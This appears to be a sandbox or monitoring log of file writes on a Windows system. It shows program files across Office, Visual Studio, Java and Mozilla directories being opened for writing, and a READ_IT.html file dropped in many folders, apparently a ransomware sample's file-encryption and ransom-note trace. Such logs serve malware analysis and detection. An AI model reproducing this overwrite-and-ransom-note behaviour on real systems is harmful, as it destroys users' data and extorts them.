Create	C:\Users\All Users\Adobe\Acrobat\10.0\Replicate\Security\directories.acrodata	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Adobe\Acrobat\10.0\Replicate\Security\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\MSBuild\Microsoft.Office.InfoPath.targets	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\MSBuild\none.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Mozilla Maintenance Service\updater.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Mozilla Maintenance Service\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\VSTAClientPkg.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\VSTAProject.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\1033\VSTAClientPkgUI.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\1033\VSTAProjectUI.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AppConfigurationInternal.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Class.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dialog.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Explorer.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\ResourceInternal.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SplashScreen.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Text.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\UserControl.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AboutBox.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfig.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfo.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\CodeFile.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\DataSet.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Interface.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\ResourceInternal.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Settings.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\SettingsInternal.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\UserControl.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Visualizer.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PublicAssemblies\Microsoft.VisualStudio.Tools.Applications.Adapter.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PublicAssemblies\Microsoft.VisualStudio.Tools.Applications.AddInManager.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PublicAssemblies\Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PublicAssemblies\Microsoft.VisualStudio.Tools.Applications.DesignTime.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PublicAssemblies\System.AddIn.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.Tools.Applications.Project.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\AUTHZAX.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\BCSLaunch.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\DGRMLNCH.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\IEAWSDC.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\INLAUNCH.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\MSOHEV.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.EXE	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\NAME.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\NAMECONTROLPROXY.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\NAMEEXT.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\NPAUTHZ.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\NPSPWRAP.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\oisctrl.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\OLKFSTUB.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\OneNoteSyncPC.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\ONLNTCOMLIB.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\OWSSUPP.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\PPSLAX.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\STSCOPY.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\STSUPLD.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\UMLVB.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\UMLVC60.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\UMLVS.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\VVIEWDWG.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\VVIEWER.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\1033\BHOINTL.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\1033\DL_RES.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\1033\MAPISHELLR.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\1033\OCLTINT.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\1033\OWSHLP10.CHM	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\1033\STSUCRES.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\1033\STSUPLD.INTL.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\1033\UMLVBRES.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\1033\UMLVC60R.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\1033\UMLVSUI.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\1033\VBAOWS10.CHM	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Office\Office14\1033\VVIEWRES.DLL	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\msmdlocal.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\msmgdsrv.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\msolap100.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\msolui100.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\artistsstatistics.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\COPYRIGHT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\LICENSE	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\README.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\release	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\THIRDPARTYLICENSEREADME.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\Welcome.html	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\accessibility.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\alt-rt.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\calendars.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\charsets.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\classlist	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\content-types.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\currency.data	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\deploy.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\flavormap.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\fontconfig.bfc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\fontconfig.properties.src	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\javafx.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\javaws.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\jce.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\jfr.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\jfxrt.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\jsse.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
